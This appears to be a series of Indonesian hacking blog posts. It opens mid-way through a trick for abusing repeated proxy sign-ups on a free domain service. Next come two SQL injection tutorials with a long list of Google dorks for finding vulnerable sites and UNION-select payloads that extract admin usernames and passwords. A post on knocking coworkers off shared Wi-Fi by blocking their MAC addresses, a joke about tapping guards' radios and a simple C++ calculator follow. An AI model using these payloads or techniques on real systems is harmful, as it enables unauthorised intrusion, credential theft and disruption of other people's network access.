3. Logout, lalu pasang proxy
4. Buka Tab baru link yang tadi kamu copas tadi kamu copas lagi ke web browser kamu (di tab barunya yaa...)
5. Sign Up sesuai dengan Proxy, (misalnya kamu punya proxy Italy, kamu isi kota dan negara di Italy karena ternyata Free Domain Box sedikit pinter untuk scan IP kita dan Lokasi IP kita sesuai IP kita)
6. Selesaikan proses Sign Up anda (Email Verification, dll.)
7. Logout
8. Ganti Proxy
9. Kembali ke nomor 4 Sampai puas

Nah, udah tau kan sekarang, dan Free Domains Box itu agak sombong, coba liat screenshot INI
Karena saya udah coba Hack dan berhasil...
OK, Happy Hacking ^_^

SQL Injection Reloaded 2

Inilah lanjutan dari SQL Injection yang lalu (maaf yaa kalo 2 postingan)
Lanjutan:
5. Mendapatkan nama table dan column
Jika versi MySQL-nya < 5 (i.e 4.1.33, 4.1.12...) kita harus menebaknya... Biasanya table bernama: user/s, admin/s, member/s Dan biasanya nama column-nya: username, user, usr, user_name, password, pass, passwd, pwd etc...
Contoh cek-nya: www.korbansqli.com/news.php?id=5 union all select 1,2,3 from admin/*
Coba kita main tebak-tebakan: www.site.com/news.php?id=5 union all select 1,username,3 from admin/* Kita masukin ke nomor 2 karena Angka yang ada tadi 2, jadi kita ganti 2 menjadi nama column Kalo salah, akan muncul error, dan jika benar, akan muncul di layar usernamenya seperti admin atau superadmin
Kita akan cari passwordnya www.site.com/news.php?id=5 union all select 1,password,3 from admin/* Jika error, gantilah nama yang lain selain password, jika benar, kita akan melihat password yang masih hash atau sudah plain text (sesuai databasenya)
Lalu, kita harus menyelesaikan Query ini (kata mpu Marezzi biar bagus :-) ) Pakailah Concat = concat()
Contoh: www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: Mpu Marezzi berkata, dia masukin 0x3a itu adalah hex value (jadi 0x3a adalah value dari column)
To be Continued Again (BANYAK BANGET!!!)

SQL Injection Reloaded

Duh, tadi mau membalas dendam pada forum para orang gila yaitu www.clancbs.com (saya gak tau kenapa bisa sebenci ini sama ntuh forum...)
Tapi becanda... coba aja liat di cerita Darkness Hacker biar tau apa alasannya... (and why it's invulnerable to SQLi???)
OK, saya baru ketemu sama SQLi menurut mpu Marezzi di www.milw0rm.com (Baru terbuka matanya en saya udah gak males baca Inggris lagi...) koq rasanya saya ketagihan SQLi yaa??? (soalnya kemaren cuma bolak-balik XSS aka Cross Site Scripting)
OK, kita ikutin aja deh si om Marezzi...
1. Cari korban digoogle (Semuanya ada di Google, kecuali gua dengan dork nama asli gw...)
dengan dork super banyak ini:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

WOW!!! Buanyak buanget suanget kuebeluet matiet en dibeluit-beluit (APA SEEH?????)

Jika udah ketemu, misal: www.korbansqli.com/news.php?id=5
1. Tambah single quote (') pada belakang URL, contoh: www.korbansqli.com/news.php?id=5'
2. Cari angka dalam columns: tambahkan dibelakan URL: order by 1/* contoh: www.korbansqli.com/news.php?id=5 order by 1/*
angka 1 untuk menghitung angka, jadi, jika tidak ada error, ganti nomor 2, jika tidak ada error juga, ganti jadi 3 dan seterusnya, contoh:
www.korbansqli.com/news.php?id=5 order by 1/* =Gak error
www.korbansqli.com/news.php?id=5 order by 2/* =Gak error
www.korbansqli.com/news.php?id=5 order by 3/* =Gak error
www.korbansqli.com/news.php?id=5 order by 4/* =ERROR

Nah, kalo error-nya di 4, berarti ada 3 angka
3. Cek UNION Function
Tambahkan di belakang URL: union all select 1,2,3/* Contoh: www.korbansqli.com/news.php?id=5 union all select 1,2,3/*
Jika ada tulisan contoh: 1 atau 2 atau 3 berarti UNION-nya bekerja...
4. Cek MySQL Version
NOTE: kalo diatas (3) UNION-nya gak bisa, coba /* diganti --
Contohnya, di layar ada angka 2, nah, angka 2 pada URL diganti @@version atau version() dan anda akan mendapat 4.1.33-log atau 5.0.45 atau semacamnya
Jika anda mendapatkan "union + illegal (IMPLICIT + COERCIBLE)..."
Yang kita butuhkan adalah convert()
Contoh: www.korbansqli.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
Atau memakai hex() atau unhex():
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version using latin1)),3/*
Dan kamu dapet MySQL Version...
5. Mendapatkan nama Table dan Column
TO BE CONTINUED (TERLALU BANYAK)

Freeze Access Point aka AP

Akhirnya update juga, Oke teman-teman, kita akan belajar tentang Block beberapa MAC Address dari Access Point untuk mengakses Internet.
TUJUAN:
- Iseng
- Berinternet dengan cepat karena jika ada beberapa komputer mengakses AP, Semakin lambat akses internetnya...

Belum tau apa itu AP atau WiFi atau semacamnya? kita cerita bentar, ceritanya, anda disebuah kantor yang ada WiFi-nya, lalu pas istirahat, semuanya pada WiFi-an, nah, kan banyak orang yang akses, jadi internet anda semakin lambat, karena semakin banyak orang akses, semakin lambat, Perumpamaanya: Ada sebuah ember (AP) dan Selang yang sedang mengisi air kedalam ember (Speed Internet), nah, Selang itu dibolongi kecil satu (Pengguna) semakin banyak bolongan (Semakin banyak user) Semakin sedikit air yang bisa sampai ke Ember (AP)
Begitulah kira-kira gambaran kita tentang masalah ini...

Dalam tutorial ini, Spesifikasinya adalah:
- WiFi Card PCI : D-Link DWL-G10 AirPlus
- OS: Windows XP
Spesifikasi Target:
- Access Point : WRT54G
- Firmware : Firmware 5.0
Persiapan:
- Pastikan WiFi konek ke AP
- Application: MC Afee Wireless Home Network Security (Googling ajah nyarinya...)
- Pastikan Aplikasi diatas bisa di-install

Tutorial:
1. Install dulu yee yang MCAffee itu...
2. Kalo udah, buka aplikasinya, lalu pilih AP target trus double klik, trus muncul beberapa MAC Address deh...
3. Klik kanan ke MAC Address Sasaran, lalu Block! tapi HATI-HATI! siapa tau itu MAC Address kita... Sasaran nggak bisa konek sebelum di un-block lagi...

Ending:
Ini adalah contoh "Application Malfunction" (Penyalah-gunaan Aplikasi) seperti Hack Billing Warnet dengan ZHider. Kita gak perlu susah-susah dapet password admin, dll. cukup pake Aplikasi MCAfee tersebut, GAME OVER...

OK, Selamat perang WiFi... (hehehe...)

Penulis: lirva32
Sumber: www.spyrozone.net

Ngerjain Satpam dengan mengakali Radio

Dengan ini, kamu bisa join ngobrol sama si satpam yang sedang berwalky-talky, tuh, Gila gak tuh???
Caranya nih,
Persiapan:
- Radio yang bisa nyari frekuensi
- Kaleng Bekas (jangan kaleng susu yang masih penuh yaa... ^_^)
- Benda sejenis tali yang bisa mengirim getaran (Contoh dalam tutorial ini: Kabel)
- Ada korban pak satpam...

Oke, go to tutorial
1. Kaleng bekas dibolongi pantatnya, lalu kabel disambungkan ke kaleng (kayak pengen bikin telepon pake kaleng lhoo...)
2. Kabel sisi satunya (yang bukan diiket sama kaleng), kamu iket dengan antena radio.
Gambar (biar gak bingung):

3. Antena Radio kamu arahin ke pak satpam yang ber-walky-talky lalu cari frekuensi di radio (penulis asli yakin anda bisa karena Walky talky satpam tuh gede frekuensinya...

Selesai tutor diatas, kamu bisa join dah ngomong di walky-talky...
Hehehehehe.......

Udah yee... Funny bukan? Hahaha...

---END---

Penulis: sevenC / NO:7 & JOE_VICKY
Sumber: www.spyrozone.net

C++ Untuk membuat Calculator Sederhana

Udah 3 Hari gak ada postingan mengakibatkan 2 hari ini gak ada pengunjung, gini deh, saya mau share tentang apa yang saya dapat dari google, yaitu tentang programming (akhirnya ada juga artikel tentang programming.)
Nah, kita sekarang obrolin C++ (blom apa-apa udah blagu sama C++...)
Nih dia, Kalkulator untuk Ce ples ples...
Code:
#include
#include
void menu();
void jumlah();
void kurang();
void kali();
void bagi();void main()
{
char chrPilihan;
do
{
menu();
fflush(stdin);
scanf(”%c”,&chrPilihan);
if ((chrPilihan == ‘x’)||(chrPilihan == ‘x’))
{ printf(”Thanks for use this program… egie_ku@yahoo.com”);
break;} switch (chrPilihan)
{ case ‘1′:
jumlah();
break;
case ‘2′:
kurang();
break;
case ‘3′:
kali();
break;
case ‘4′:
bagi();
break;
default:
printf(”\nSorry bro.. Kode yang di imput salah…\n”);
}
}
while(chrPilihan != ‘x’);
}
void menu()
{
printf(” \n”);
printf(”Main Menu\n”);
printf(”==================\n”);
printf(”1. Operasi Penjumlahan\n”);
printf(”2. Operasi Pengurangan\n”);
printf(”3. Operasi Perkalian\n”);
printf(”4. Operasi Pembagian\n”);
printf(”x. Untuk Keluar\n”);
printf(” \n”);
printf(”Input kode masukkan,bro!!: “);
}
void jumlah()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1+bil2;
printf(”Hasilnya tambahannya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}
void kurang()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1-bil2;
printf(”Hasilnya kurangannya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}
void kali()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1*bil2;
printf(”Hasilnya kalinya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}
void bagi()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1/bil2;
printf(”Hasilnya baginya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}

Wew... Copas aje yee.... Oke....
Selamat Programming...

Sumber: www.nusinau.com

Note: Jika ada kesalahan atau keluhan tentang Code-code diatas, semoga anda memposkannya di komentar, dan saya akan perbaiki secepat-cepatnya.